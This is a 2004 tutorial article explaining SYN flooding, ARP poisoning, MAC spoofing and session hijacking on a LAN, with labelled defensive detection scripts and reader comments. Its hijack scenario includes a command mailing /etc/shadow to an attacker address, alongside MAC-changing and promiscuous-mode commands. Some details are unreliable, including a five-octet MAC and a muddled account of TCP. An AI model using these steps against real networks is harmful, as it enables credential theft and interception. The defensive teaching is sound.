APLawrence.com -  Resources for Unix and Linux Systems, Bloggers and the self-employed


© May 2004 Amitesh Singh

Amitesh Singh(singh.amitesh@gmail.com, https://amitesh.cjb.net)
Mohit Bhatnagar(bhatnagar.mohit@gmail.com)
B.Tech(Indian School of Mines, INDIA)


Communication on a LAN takes place through protocols such as TCP/IP, UDP/IP, ARP and ICMP; the most popular of these is TCP/IP.


TCP(Transmission Control Protocol)


Data sent on the network is in the form of packets, which contain information about the source, the target and the data to be sent. TCP is a protocol developed to make sure that packets are not lost on the network as routers send them from computer to computer. TCP splits a packet into little pieces; each piece is called a datagram.

A typical datagram looks like this:

    Ethernet header : Destination MAC, Source MAC
    IP HEADER       : Dest IP, Source IP
    TCP HEADER      : Dest port, Source port
    data


The address of the network card is called the MAC address. The MAC address is a globally unique and unchangeable address which is stored on the network card itself.


TCP HEADER FLAGS (that we care about)





Sending a packet with the SYN flag set means its sender wants to establish a TCP/IP connection with the destination system by way of the three-way handshake. Let's understand this in a better way.

Suppose you are A and the other system is B, and you want a connection with B.




Now the TCP connection is established.




SYN flooding is an attack in which a large number of SYN packets are sent to the target (victim) by an attacker using a fake source IP address, so that all the memory of the target is used up trying to establish connections with a fake IP address that does not exist on the network.




As a result of SYN flooding, all the services running on the attacked ports of the target computer are affected. The computer is kept busy sending SYN/ACK packets and is unable to provide service to legitimate users or clients. If an enormously large number of SYN packets are sent, the target may hang or reboot.


How the attack is done:


Windows is vulnerable to SYN-flood attacks.

Here is the state of the target when we flooded it from my computer, using a fake source IP address, on ports 25 and 139. (The fake address must have your network ID, which here is 169.254, and it should be non-existent; you can check whether it exists by pinging it.)



Active Connections


  Proto  Local Address          Foreign Address        State




How to detect SYN Attack


When the attacker's system sends a SYN packet to the target, the target replies with a SYN/ACK packet and then waits to receive an ACK. While it waits, the connection is said to be half-open, or the target is said to be in the SYN_RECEIVED state. This is the state one can use to detect whether a system is under a SYN flood or not.
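The following script is an added example, not part of the original article: it turns the half-open (SYN_RECEIVED) check described above into detection logic that runs over `netstat -an` output. The sample output embedded in it is constructed for the example (the addresses and the threshold value are assumptions), and the script counts half-open connections per local port and per claimed foreign address, which is the signature a flood from a non-existent source leaves behind.

```python
import re
from collections import Counter

# Constructed sample of Windows "netstat -an" output. The addresses are made up
# for this example; 169.254.10.5 plays the flooded host and the SYN_RECEIVED
# rows are the half-open connections a flood leaves behind on ports 25 and 139.
SAMPLE_NETSTAT = """
Active Connections

  Proto  Local Address          Foreign Address        State
  TCP    169.254.10.5:25        169.254.10.77:1031     SYN_RECEIVED
  TCP    169.254.10.5:25        169.254.10.77:1032     SYN_RECEIVED
  TCP    169.254.10.5:25        169.254.10.77:1033     SYN_RECEIVED
  TCP    169.254.10.5:139       169.254.10.77:1034     SYN_RECEIVED
  TCP    169.254.10.5:139       169.254.10.77:1035     SYN_RECEIVED
  TCP    169.254.10.5:139       169.254.10.23:2201     ESTABLISHED
  TCP    169.254.10.5:445       0.0.0.0:0              LISTENING
  UDP    169.254.10.5:137       *:*
"""

# One socket row: protocol, local addr:port, foreign addr:port, optional state.
ROW_RE = re.compile(r"^\s*(TCP|UDP)\s+(\S+):(\d+)\s+(\S+):(\d+|\*)\s*(\S+)?\s*$")


def parse_netstat(text):
    """Turn 'netstat -an' output into a list of socket dicts; other lines are skipped."""
    rows = []
    for line in text.splitlines():
        m = ROW_RE.match(line)
        if not m:
            continue
        proto, laddr, lport, faddr, fport, state = m.groups()
        rows.append({
            "proto": proto,
            "local_addr": laddr,
            "local_port": int(lport),
            "foreign_addr": faddr,
            "foreign_port": fport,
            "state": state or "",
        })
    return rows


def half_open(rows):
    """Only TCP sockets in SYN_RECEIVED count as half-open connections."""
    return [r for r in rows if r["proto"] == "TCP" and r["state"] == "SYN_RECEIVED"]


def detect_syn_flood(text, port_threshold=50):
    """Report local ports whose half-open count reaches the threshold.

    port_threshold is an assumed value for the example: tune it to the host's
    normal backlog, since a busy server legitimately holds a few half-open
    connections for the round-trip time of each new client.
    """
    pending = half_open(parse_netstat(text))
    by_port = Counter(r["local_port"] for r in pending)
    by_source = Counter(r["foreign_addr"] for r in pending)
    return {
        "total_half_open": len(pending),
        "suspicious_ports": {p: n for p, n in by_port.items() if n >= port_threshold},
        # Many half-open entries from one (unreachable) address is the classic
        # signature: the SYN/ACKs go to a host that never sends the final ACK.
        "top_sources": by_source.most_common(3),
    }


if __name__ == "__main__":
    report = detect_syn_flood(SAMPLE_NETSTAT, port_threshold=3)
    print(f"half-open connections: {report['total_half_open']}")
    for port, n in report["suspicious_ports"].items():
        print(f"  port {port}: {n} half-open (threshold reached)")
    print("top claimed sources:", report["top_sources"])
```

The threshold is deliberately a parameter: on a real host, take a few snapshots during normal load first, because a single snapshot with a handful of SYN_RECEIVED entries is ordinary, and it is the sustained count on one port, from sources that never complete the handshake, that indicates a flood.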


arp -a: another way to detect a SYN attack


In the previous attack, the ARP cache of the flooded machine was:


Interface: (address not shown) on Interface 0x1000003

  Internet Address      Physical Address      Type
  (address not shown)   00-00-00-00-00-00     invalid
  (address not shown)   00-0c-6e-f1-9e-a3     dynamic


As shown in the highlighted entry, if the connection type is invalid and the MAC address is all zeros as shown above, it can be deduced that you are under a SYN flood.




Spoofing is a technique to disguise yourself as somebody else, who may or may not exist on the network, depending upon your choice. It forms the basis of attacks on the network. There are many types of spoofing, like


In this paper I shall discuss only ARP spoofing.



Any computer connected to a switched network (LAN) has two addresses.


The MAC address is the network card's address and it is fixed. It is essential so that the Ethernet protocol can send data back and forth independent of whatever protocols (TCP/IP, UDP, FTP etc.) are used on top of it. Ethernet builds frames of data, and each frame has an Ethernet header containing the MAC addresses of the source and the destination computer.

The IP address is a virtual address of the computer on the network.




When an Ethernet frame is constructed, it must be built from an IP packet. At the time of construction, Ethernet has no idea what the MAC address of the destination machine is, which it needs in order to create the Ethernet header. The only information it has available is the destination IP from the packet's header. There must be a way for the Ethernet layer to find the MAC address of the destination machine, given a destination IP.


This is where ARP (Address Resolution Protocol) comes into play.



                                        Fig 1

Let us suppose A wants to connect to C. A will then generate an ARP request packet and broadcast it to all the hosts on the network, asking: "Is this your IP address? If so, send your MAC address to me."


Since the ARP request is sent in a broadcast frame, every Ethernet interface on the network reads it in and hands the ARP request to the networking software running on the system. Only C, which has that IP address, will respond, by sending a packet containing C's MAC address back to the requesting system. Now A has a MAC address to which it can send data destined for C, and the higher-level protocol communication can proceed.

To minimize the number of ARP requests being broadcast, operating systems keep a cache of ARP replies. When a computer receives an ARP reply, it updates its ARP cache with the new IP/MAC association.
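The following is an added example, not code from the article: a builder and parser for the ARP request and reply just described, at the byte level, wrapped in the Ethernet header that carries them. It shows why the request has to be a broadcast (the target MAC field is still zero) and why the reply can be a unicast (the requester's MAC is now known). The MAC and IP addresses for A and C are constructed for the example; the field layout follows the Ethernet and ARP headers.

```python
import struct

# Wire layouts in network byte order; field order follows the Ethernet and
# ARP (RFC 826) headers.
ETH_FMT = "!6s6sH"            # destination MAC, source MAC, EtherType
ARP_FMT = "!HHBBH6s4s6s4s"    # htype, ptype, hlen, plen, opcode, sha, spa, tha, tpa
ETHERTYPE_ARP = 0x0806
ARP_REQUEST, ARP_REPLY = 1, 2
BROADCAST_MAC = "ff:ff:ff:ff:ff:ff"
ZERO_MAC = "00:00:00:00:00:00"


def mac_to_bytes(mac):
    return bytes(int(x, 16) for x in mac.split(":"))


def bytes_to_mac(b):
    return ":".join(f"{x:02x}" for x in b)


def ip_to_bytes(ip):
    return bytes(int(x) for x in ip.split("."))


def bytes_to_ip(b):
    return ".".join(str(x) for x in b)


def build_arp(opcode, sender_mac, sender_ip, target_mac, target_ip):
    """Serialize one 28-byte Ethernet/IPv4 ARP message."""
    return struct.pack(ARP_FMT, 1, 0x0800, 6, 4, opcode,
                       mac_to_bytes(sender_mac), ip_to_bytes(sender_ip),
                       mac_to_bytes(target_mac), ip_to_bytes(target_ip))


def arp_request(asker_mac, asker_ip, wanted_ip):
    """'Is this your IP? If so, send your MAC to me.' Target MAC is unknown, so zero."""
    return build_arp(ARP_REQUEST, asker_mac, asker_ip, ZERO_MAC, wanted_ip)


def arp_reply(owner_mac, owner_ip, asker_mac, asker_ip):
    """Answer from the owner of the IP: the sender fields carry the owner's MAC/IP."""
    return build_arp(ARP_REPLY, owner_mac, owner_ip, asker_mac, asker_ip)


def ethernet_frame(dst_mac, src_mac, payload, ethertype=ETHERTYPE_ARP):
    return struct.pack(ETH_FMT, mac_to_bytes(dst_mac), mac_to_bytes(src_mac), ethertype) + payload


def parse_arp(payload):
    """Decode an ARP message; rejects anything that is not Ethernet/IPv4 ARP."""
    size = struct.calcsize(ARP_FMT)
    if len(payload) < size:
        raise ValueError("ARP payload too short")
    htype, ptype, hlen, plen, opcode, sha, spa, tha, tpa = struct.unpack(ARP_FMT, payload[:size])
    if (htype, ptype, hlen, plen) != (1, 0x0800, 6, 4):
        raise ValueError("not an Ethernet/IPv4 ARP message")
    return {
        "op": {ARP_REQUEST: "request", ARP_REPLY: "reply"}.get(opcode, f"op{opcode}"),
        "sender_mac": bytes_to_mac(sha), "sender_ip": bytes_to_ip(spa),
        "target_mac": bytes_to_mac(tha), "target_ip": bytes_to_ip(tpa),
    }


def parse_frame(frame):
    """Split the Ethernet header off and decode the ARP message inside it."""
    hdr = struct.calcsize(ETH_FMT)
    dst, src, ethertype = struct.unpack(ETH_FMT, frame[:hdr])
    if ethertype != ETHERTYPE_ARP:
        raise ValueError(f"EtherType 0x{ethertype:04x} is not ARP")
    return {"dst_mac": bytes_to_mac(dst), "src_mac": bytes_to_mac(src), "arp": parse_arp(frame[hdr:])}


# Constructed addresses for A and C (not the ones used in the article).
A_MAC, A_IP = "00:11:22:33:44:01", "169.254.1.1"
C_MAC, C_IP = "00:11:22:33:44:03", "169.254.1.3"


def exchange():
    """The request/reply exchange: the request is broadcast, the reply is unicast to A."""
    request = ethernet_frame(BROADCAST_MAC, A_MAC, arp_request(A_MAC, A_IP, C_IP))
    req = parse_frame(request)
    # C answers only if the target IP is its own.
    if req["arp"]["op"] != "request" or req["arp"]["target_ip"] != C_IP:
        raise RuntimeError("request is not for C")
    reply = ethernet_frame(req["src_mac"], C_MAC,
                           arp_reply(C_MAC, C_IP, req["arp"]["sender_mac"], req["arp"]["sender_ip"]))
    return req, parse_frame(reply)


if __name__ == "__main__":
    for decoded in exchange():
        print(decoded)
```

Note that nothing in the reply ties it to a request: the parser has no field to check, which is exactly the statelessness that the ARP poisoning section later relies on.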


If you want to know the MAC address of a remote host, just type

C:\>nbtstat -A [ip address]    or    nbtstat -a chetan


Local Area Connection:

Node IPAddress: [] Scope Id: []


  NetBIOS Remote Machine Name Table

      Name               Type         Status



    CHETAN         <00>  UNIQUE      Registered

    CHETAN         <20>  UNIQUE      Registered

    MSHOME         <00>  GROUP       Registered

    MSHOME         <1E>  GROUP       Registered

    CHETAN         <01>  UNIQUE      Registered

    CHETAN         <03>  UNIQUE      Registered

    C_VERMA        <03>  UNIQUE      Registered


   MAC Address = 00-0C-6E-94-0A-BF




The frame takes the destination IP from the IP header of the packet, but it has no idea of the destination MAC address, which the physical link layer between the two systems requires.

The switch maintains a table which maps switch port numbers to the corresponding MAC addresses. The table is built after the switch is powered on, from the source MAC address of the first frame that passes through each switch port.










This is the situation when no ARP request/reply or data transfer has taken place. Suppose H wants to connect to T1 (refer to Fig 3): an ARP request is broadcast over the LAN to all current users, asking "Is your IP X1? If so, send me back your MAC address." When this passes through the switch, an entry for H's MAC address is made in the switch's cache. Now the table will look like












Obviously T1 responds with an ARP reply, unicast to H, which contains its own MAC address. Moreover, the ARP cache of T1 will now contain an entry for H's IP address and MAC address, hence it sends the ARP reply directly to H. As this reply passes through the switch, arriving on port 1, the cache of the switch will be updated to











When the ARP reply reaches the switch, the switch decides which port to send the frame to by comparing the destination address of the frame with an internal table which maps port numbers to MAC addresses. The frame will now be sent down the cable through port 3.
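As an added example (not from the article), here is a small model of the learning switch the text has been describing, replaying the Fig 3 exchange: H's broadcast request is flooded and H's MAC is learned on port 3, T1's unicast reply is learned on port 1 and delivered only to port 3. A third step, the flooding of a frame for a destination the switch has not yet learned, goes one step beyond the text. The MAC addresses and port numbers are constructed for the example.

```python
BROADCAST = "ff:ff:ff:ff:ff:ff"


class LearningSwitch:
    """A transparent bridge as the article describes it: learn the source MAC on
    the ingress port, forward to the known port for the destination, else flood."""

    def __init__(self, ports):
        self.ports = list(ports)
        self.table = {}          # MAC address -> port number (the switch's cache)

    def forward(self, in_port, src_mac, dst_mac):
        """Return the list of ports the frame leaves on, after learning from it."""
        # Learning is driven purely by the frame's source MAC; nothing checks
        # that the address really belongs to the device on that port, which is
        # what lets a forged source MAC move an entry to another port.
        self.table[src_mac] = in_port
        if dst_mac == BROADCAST or dst_mac not in self.table:
            return [p for p in self.ports if p != in_port]   # flood
        out_port = self.table[dst_mac]
        return [] if out_port == in_port else [out_port]


# Constructed MACs for the Fig 3 layout: T1 on port 1, T2 on port 2, H on port 3.
T1_MAC, T2_MAC, H_MAC = "00:00:00:00:00:11", "00:00:00:00:00:22", "00:00:00:00:00:33"


def run_fig3_scenario():
    """Replay the ARP request/reply described in the text; record ports and table."""
    sw = LearningSwitch([1, 2, 3])
    steps = []
    # H broadcasts an ARP request for T1: flooded, and H's MAC is learned on port 3.
    out = sw.forward(3, H_MAC, BROADCAST)
    steps.append(("request from H", out, dict(sw.table)))
    # T1 answers with a unicast reply: learned on port 1, delivered only to port 3.
    out = sw.forward(1, T1_MAC, H_MAC)
    steps.append(("reply from T1", out, dict(sw.table)))
    # Data from T1 to T2: T2 has not sent anything yet, so the frame is flooded.
    out = sw.forward(1, T1_MAC, T2_MAC)
    steps.append(("T1 -> T2 before T2 is known", out, dict(sw.table)))
    return steps


if __name__ == "__main__":
    for name, out_ports, table in run_fig3_scenario():
        print(f"{name:30s} -> ports {out_ports}   table {table}")
```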




As ARP is a stateless protocol, most operating systems will update their cache when a reply is received, regardless of whether they have sent an actual request.

We can exploit this bug.




To view your cache you can type arp -a at the command prompt in Windows (and of course in Linux too).

C:\>arp -a


Interface: (address not shown) on Interface 0x1000003

  Internet Address      Physical Address      Type
  (address not shown)   00-50-ba-8e-ff-e8     dynamic
  (address not shown)   00-0b-2b-0d-fb-69     dynamic
  (address not shown)   00-50-fc-b0-f3-50     dynamic


  • (first address): your own IP address
  • 0x1000003: the code for your interface (in that case eth0)
  • Internet Address: the IP address of the remote device you are connected to
  • 00-50-ba-8e-ff-e8: the MAC address of that machine
  • dynamic: the link type




Let's observe the communication between my machine and another host on the LAN: I have its IP and MAC in my ARP table, and it has my IP and MAC in its ARP table. These values are updated once every 30 seconds. If a malicious user sends me a spoofed packet which maps that host to a non-existent MAC, I won't be able to communicate with it for at least 30 seconds! That is enough for an attacker to hijack my session. This is called ARP poisoning.

Now my ARP cache will look like

C:\>arp -a


Interface: (address not shown) on Interface 0x1000003

  Internet Address      Physical Address      Type
  (address not shown)   00-50-ba-4e-ff-e3     invalid
  (address not shown)   00-0b-2b-0d-fb-69     dynamic
  (address not shown)   00-50-fc-b0-f3-50     dynamic






Obtaining the MAC address of another system without sending your real MAC address, that is, without entering your real MAC address in the other system's ARP cache, is MAC spoofing.





                                                                      Fig 2


AIM: H aims to learn the MAC of A without revealing his real MAC.


H broadcasts an ARP request over the network, destined to reach A, with a fake MAC address Mf. Now there will be an entry for Mf in the cache of the switch corresponding to the port of H, i.e. port 2. A will send an ARP reply containing its real MAC address to Mf. When this frame reaches the switch, the fake MAC address is mapped to the port of H, i.e. port 2, and hence it is delivered to H. Now, since the Ethernet card of H is in promiscuous mode, in which it is allowed to examine frames destined for MAC addresses other than its own, A's real MAC address will be entered in H's ARP cache.

In Linux, promiscuous mode can be enabled with

# ifconfig eth0 promisc

and disabled with

# ifconfig eth0 -promisc






                                                                      Fig 3


Here H will try to insert itself into the communication path between T1 and T2. H will forward frames between the target computers so that communication is not interrupted.

H poisons the ARP caches of T1 and T2 in this way:

H sends a spoofed ARP reply to T1 containing T2's IP with H's MAC.

At the same time, H sends a spoofed ARP reply to T2 containing T1's IP with H's MAC.

Now all IP traffic between T1 and T2 will go to H first instead of directly to each other.

How this attack works

As T1 and T2 are communicating with each other, T1's ARP cache contains T2's IP and MAC address, and vice versa. H will poison the caches of T1 and T2: it sends a spoofed ARP reply to T1 containing T2's IP and H's MAC, and to T2 it sends T1's IP and H's MAC. Now in the cache of T1, the IP address of T2 will be associated with the MAC address of H. When T1 wants to send a packet, it is first split into frames. The frame takes the destination IP from the IP header of the packet to be sent, and takes the MAC address from the cache. This frame, carrying the IP address of T2 and the MAC address of H, is sent over the cable to the switch. The MAC address of the frame is now looked up in the switch's table, i.e. the cache of the switch, and as that port number is 3, the frame will be sent to H. The same thing happens in the case of T2. H then forwards the data coming from T1 to T2 and from T2 to T1, so that the connection between T1 and T2 is not interrupted and no trace is left.




To avoid this type of attack, T1 should have a static entry for T2's IP and MAC, and T2 a static entry for T1's IP and MAC, in their respective caches.

T1 will make a static entry for T2 in this way:

C:\>arp -s X2 M2
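The following is an added example, not code from the article, modelling a host's ARP cache so that the stateless behaviour described earlier (any reply updates the cache) and the static-entry defence just given can be compared side by side. The `accept_unsolicited=False` mode, which only accepts replies for addresses the host actually asked about, is an extra hardening variant not mentioned in the article; the addresses, the 30-second lifetime and the poisoning sequence are constructed for the example.

```python
class ArpCache:
    """Host ARP cache model. With accept_unsolicited=True it behaves like the
    systems the article describes (any reply updates the cache); with False it
    only accepts replies it asked for. Static entries (arp -s) are never replaced."""

    def __init__(self, accept_unsolicited=True, ttl=30.0):
        self.entries = {}        # ip -> {"mac": str, "static": bool, "expires": float}
        self.pending = set()     # IPs we have sent a request for and not yet heard back
        self.accept_unsolicited = accept_unsolicited
        self.ttl = ttl           # seconds a dynamic entry stays valid (30 s in the text)

    def add_static(self, ip, mac):
        """Equivalent of 'arp -s ip mac'."""
        self.entries[ip] = {"mac": mac, "static": True, "expires": float("inf")}

    def send_request(self, ip):
        self.pending.add(ip)

    def receive_reply(self, ip, mac, now):
        """Apply an ARP reply 'ip is-at mac'; return True if the cache changed."""
        current = self.entries.get(ip)
        if current and current["static"]:
            return False                      # static entry wins over any reply
        if not self.accept_unsolicited and ip not in self.pending:
            return False                      # a reply we never asked for
        self.pending.discard(ip)
        self.entries[ip] = {"mac": mac, "static": False, "expires": now + self.ttl}
        return True

    def lookup(self, ip, now):
        """MAC for ip, or None if unknown or expired."""
        e = self.entries.get(ip)
        if e is None or now > e["expires"]:
            return None
        return e["mac"]


# Constructed addresses: T2 is the legitimate peer, H the poisoner.
T2_IP, T2_MAC = "169.254.10.7", "00:00:00:00:00:22"
H_MAC = "00:00:00:00:00:33"


def poison_attempt(cache, now=0.0):
    """T1 first learns T2 legitimately, then an unsolicited reply claims T2's IP
    for H's MAC. Return whether that reply changed the cache and what T1 now
    believes T2's MAC to be."""
    cache.send_request(T2_IP)
    cache.receive_reply(T2_IP, T2_MAC, now)
    changed = cache.receive_reply(T2_IP, H_MAC, now + 1.0)
    return changed, cache.lookup(T2_IP, now + 2.0)


def compare_defences():
    results = {}
    results["default"] = poison_attempt(ArpCache())
    hardened = ArpCache()
    hardened.add_static(T2_IP, T2_MAC)                      # arp -s on T1
    results["static entry"] = poison_attempt(hardened)
    results["solicited only"] = poison_attempt(ArpCache(accept_unsolicited=False))
    return results


if __name__ == "__main__":
    for mode, (changed, mac) in compare_defences().items():
        print(f"{mode:15s} poisoned={changed}  T2 resolves to {mac}")
```

The static entry protects T1 only for the one peer it was made for, and it has to be maintained by hand whenever T2's card is replaced; that administrative cost is why it is usually reserved for a few critical hosts such as the gateway.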




We performed this attack on a LAN successfully:

  System                                      IP Address      MAC Address
  H (attacker): Fedora Core                   (not shown)     (not shown)
  Target 1: Windows 2000 (Version 5.00.2195)  (not shown)     00:02:44:57:7c:45
  Target 2: Windows XP                        (not shown)     (not shown)





H sends spoofed ARP replies to T1 and T2. The ARP caches of T1 and T2 when they were spoofed:


Interface: (address not shown) --- 0x2

  Internet Address      Physical Address      Type
  (address not shown)   00-0c-f1-6b-78-4f     dynamic


We can see that in the cache of T1, the IP address of T2 corresponds to H's MAC.


Interface: (address not shown) on Interface 0x2

  Internet Address      Physical Address      Type
  (address not shown)   00-0c-f1-6b-78-4f     dynamic
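As an added example (not part of the article), the following script checks an `arp -a` listing for the two indicators the article points out: the `invalid` / all-zero entries left by the SYN flood earlier, and, as in T1's cache above, a single MAC answering for more than one IP address after poisoning. The sample listing is constructed for the example (the IPs are made up; the MAC 00-0c-f1-6b-78-4f plays H's), and the `allowlist` parameter is an assumption for hosts such as a router that legitimately answer ARP for several addresses.

```python
import re
from collections import defaultdict

# Constructed 'arp -a' output as seen on a poisoned T1: the MAC of .7 and .9
# coincide (the article's T2 entry now carries H's MAC) and one invalid
# all-zero entry is present (the SYN-flood indicator from earlier).
SAMPLE_ARP_A = """\
Interface: 169.254.10.5 --- 0x2
  Internet Address      Physical Address      Type
  169.254.10.1          00-50-ba-8e-ff-e8     dynamic
  169.254.10.7          00-0c-f1-6b-78-4f     dynamic
  169.254.10.9          00-0c-f1-6b-78-4f     dynamic
  169.254.10.200        00-00-00-00-00-00     invalid
"""

ROW_RE = re.compile(
    r"^\s*(\d{1,3}(?:\.\d{1,3}){3})\s+([0-9a-fA-F]{2}(?:-[0-9a-fA-F]{2}){5})\s+(\w+)\s*$"
)
ZERO_MAC = "00-00-00-00-00-00"


def parse_arp_table(text):
    """Return (ip, mac, type) tuples from Windows 'arp -a' output; MACs lower-cased."""
    rows = []
    for line in text.splitlines():
        m = ROW_RE.match(line)
        if m:
            ip, mac, kind = m.groups()
            rows.append((ip, mac.lower(), kind.lower()))
    return rows


def invalid_entries(rows):
    """Entries marked invalid or resolved to the all-zero MAC: unanswered ARP for
    an address nobody owns, which is what spoofed SYN sources leave behind."""
    return [ip for ip, mac, kind in rows if kind == "invalid" or mac == ZERO_MAC]


def shared_macs(rows, allowlist=()):
    """Dynamic entries where one MAC answers for several IPs. allowlist holds MACs
    that legitimately do so (e.g. a router doing proxy ARP); fill it in per site."""
    by_mac = defaultdict(list)
    for ip, mac, kind in rows:
        if kind == "dynamic" and mac not in allowlist:
            by_mac[mac].append(ip)
    return {mac: ips for mac, ips in by_mac.items() if len(ips) > 1}


def analyze_arp_cache(text, allowlist=()):
    rows = parse_arp_table(text)
    return {
        "entries": len(rows),
        "invalid": invalid_entries(rows),
        "shared": shared_macs(rows, allowlist),
    }


if __name__ == "__main__":
    report = analyze_arp_cache(SAMPLE_ARP_A)
    print(f"{report['entries']} entries")
    print("invalid / unresolved:", report["invalid"])
    for mac, ips in report["shared"].items():
        print(f"MAC {mac} claims {len(ips)} addresses: {', '.join(ips)}")
```

A shared MAC is only meaningful when the expected mapping is known: comparing the listing against a snapshot taken when the LAN was healthy, or against the switch's own port table, tells a poisoned entry apart from a host that really owns two addresses.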



On the hacker's system, the received packets are:


23:42:02.474661 arp reply is-at 0:c:f1:6b:78:4f

23:42:04.084663 arp reply is-at 0:c:f1:6b:78:4f

23:42:04.484652 arp reply is-at 0:c:f1:6b:78:4f

23:42:06.094662 arp reply is-at 0:c:f1:6b:78:4f

23:42:06.494660 arp reply is-at 0:c:f1:6b:78:4f

23:42:08.104664 arp reply is-at 0:c:f1:6b:78:4f

23:42:08.504663 arp reply is-at 0:c:f1:6b:78:4f

23:42:10.114661 arp reply is-at 0:c:f1:6b:78:4f


When T1 was trying to connect to T2 on port 25, the packets were passing through H as shown below, which proves that H is now in between T1 and T2.


23:42:46.294660 arp reply is-at 0:c:f1:6b:78:4f

23:42:46.694653 arp reply is-at 0:c:f1:6b:78:4f

23:42:46.705306> S 398263844:398263844(0) win 64240 <mss 1460,nop,nop,sackOK> (DF)


Also, when the ping command was used to troubleshoot, the datagrams again passed through H as shown below.


23:43:27.254104 > icmp: echo request [ttl 1]

23:43:28.504663 arp reply is-at 0:c:f1:6b:78:4f

23:43:28.904661 arp reply is-at 0:c:f1:6b:78:4f

23:43:30.266360 > icmp: echo request [ttl 1]

23:43:30.514657 arp reply is-at 0:c:f1:6b:78:4f

23:43:30.914662 arp reply is-at 0:c:f1:6b:78:4f

23:43:32.524663 arp reply is-at 0:c:f1:6b:78:4f

23:43:32.924654 arp reply is-at 0:c:f1:6b:78:4f

23:43:33.270757 > icmp: echo request [ttl 1]

23:43:34.534662 arp reply is-at 0:c:f1:6b:78:4f

23:43:34.935399 arp reply is-at 0:c:f1:6b:78:4f
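The capture above is the attacker's view; the same tcpdump line format can be read on the monitored host or on a mirror port to catch the poisoning from the other side. The following is an added example, not code from the article: it parses tcpdump's `arp reply ... is-at ...` and `arp who-has ... tell ...` lines, marks each reply as solicited only if a request for that IP was seen shortly before it, and flags a burst of unsolicited replies and any MAC that claims several IPs. The sample lines are constructed for the example with the IP fields present (the article's capture has them stripped); the window and burst threshold are assumptions.

```python
import re
from collections import defaultdict

# Constructed tcpdump lines in the same format as the article's capture, with
# the IP fields present. The first five are replies nobody asked for; the last
# pair is a normal request/answer.
SAMPLE_CAPTURE = """\
23:42:02.474661 arp reply 169.254.10.9 is-at 0:c:f1:6b:78:4f
23:42:04.084663 arp reply 169.254.10.7 is-at 0:c:f1:6b:78:4f
23:42:04.484652 arp reply 169.254.10.9 is-at 0:c:f1:6b:78:4f
23:42:06.094662 arp reply 169.254.10.7 is-at 0:c:f1:6b:78:4f
23:42:06.494660 arp reply 169.254.10.9 is-at 0:c:f1:6b:78:4f
23:42:10.000000 arp who-has 169.254.10.1 tell 169.254.10.5
23:42:10.001200 arp reply 169.254.10.1 is-at 0:50:ba:8e:ff:e8
"""

LINE_RE = re.compile(
    r"^(\d\d):(\d\d):(\d\d)\.(\d{6}) arp "
    r"(?:reply (\S+) is-at (\S+)|who-has (\S+) tell (\S+))\s*$"
)


def norm_mac(mac):
    """tcpdump prints '0:c:f1:...'; pad each octet to two hex digits."""
    return ":".join(f"{int(x, 16):02x}" for x in mac.split(":"))


def parse_capture(text):
    """Turn tcpdump ARP lines into request/reply events with a time in seconds."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        hh, mm, ss, us, rip, rmac, qip, qfrom = m.groups()
        t = int(hh) * 3600 + int(mm) * 60 + int(ss) + int(us) / 1e6
        if rip:
            events.append({"t": t, "kind": "reply", "ip": rip, "mac": norm_mac(rmac)})
        else:
            events.append({"t": t, "kind": "request", "ip": qip, "from": qfrom})
    return events


def classify_replies(events, request_window=2.0):
    """Mark a reply solicited if a who-has for that IP preceded it within the window."""
    last_request = {}
    out = []
    for ev in events:
        if ev["kind"] == "request":
            last_request[ev["ip"]] = ev["t"]
            continue
        asked = last_request.get(ev["ip"])
        solicited = asked is not None and 0 <= ev["t"] - asked <= request_window
        out.append(dict(ev, solicited=solicited))
    return out


def poisoning_indicators(text, min_unsolicited=3):
    """Summarize unsolicited replies and MACs that claim more than one IP."""
    replies = classify_replies(parse_capture(text))
    unsolicited = [r for r in replies if not r["solicited"]]
    ips_per_mac = defaultdict(set)
    for r in unsolicited:
        ips_per_mac[r["mac"]].add(r["ip"])
    return {
        "unsolicited": len(unsolicited),
        "solicited": len(replies) - len(unsolicited),
        "flag": len(unsolicited) >= min_unsolicited,
        "macs_claiming_multiple_ips": {
            m: sorted(ips) for m, ips in ips_per_mac.items() if len(ips) > 1
        },
    }


if __name__ == "__main__":
    report = poisoning_indicators(SAMPLE_CAPTURE)
    print(f"unsolicited replies: {report['unsolicited']}, solicited: {report['solicited']}")
    if report["flag"]:
        print("possible ARP poisoning from:", report["macs_claiming_multiple_ips"])
```

The periodic re-sending visible in the article's capture (a fresh reply every second or two) is what keeps the victims' 30-second entries poisoned, so a steady stream of replies for the same IP with no matching request is the strongest single signal here; a one-off unsolicited reply is also what a host legitimately sends when its interface comes up, so the threshold should not be set to one.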




As I mentioned above, the MAC address can't change, but Linux users can change their MAC address without any spoofing software, using a single ifconfig parameter. We can exploit this:

# ifconfig eth0 hw ether 00:0c:ff:4f:e8


In Windows 2000/XP you can do it using software such as SMAC.


This can be exploited as follows: H DoS-attacks T2 (refer to Fig. 3), then assigns himself the IP and MAC of T2, receiving all frames from T1 intended for T2.










                                                               Fig 4



Let us suppose A has connected to server B as root/administrator using the TELNET or FTP service. A hacker H who is able to sniff the network will ARP-poison A, reset his own settings to those of A, and then be able to issue commands in place of A, like mail hacker_1@greathackers.com </etc/shadow; that is enough. The hacker must DoS A with either SYN flooding or ARP poisoning so that A will not be able to interfere in his attack by storming ARP requests.




Instead of making a telnet login, A can use an SSH (Secure Shell) or SFTP login to avoid TCP/IP hijacking.




Good article!

it sucks
u r an*\*****...........

---December 10, 2004

That's pretty stupid.

If you can write a better article, we're happy to publish it. If you want to add specific comments to make this better, we'll publish those too. But your stupid comment doesn't help anyone, does it?


---December 10, 2004

I found your article very interesting and easy reading, except for the fact that I couldn't see any images that are referred to in the article. Could you please ensure that the images are available. Ta.

-- Ajay Kamath

---December 21, 2004

Wed Apr 13 10:36:16 2005: 337   anonymous

good articles..easy to understand the content.simple language.nice!! i like it.it helps me a lot.


Sat Oct 15 07:48:52 2005: 1206   rajasekhar

Your article was very informative about the practical view of a network transmission,

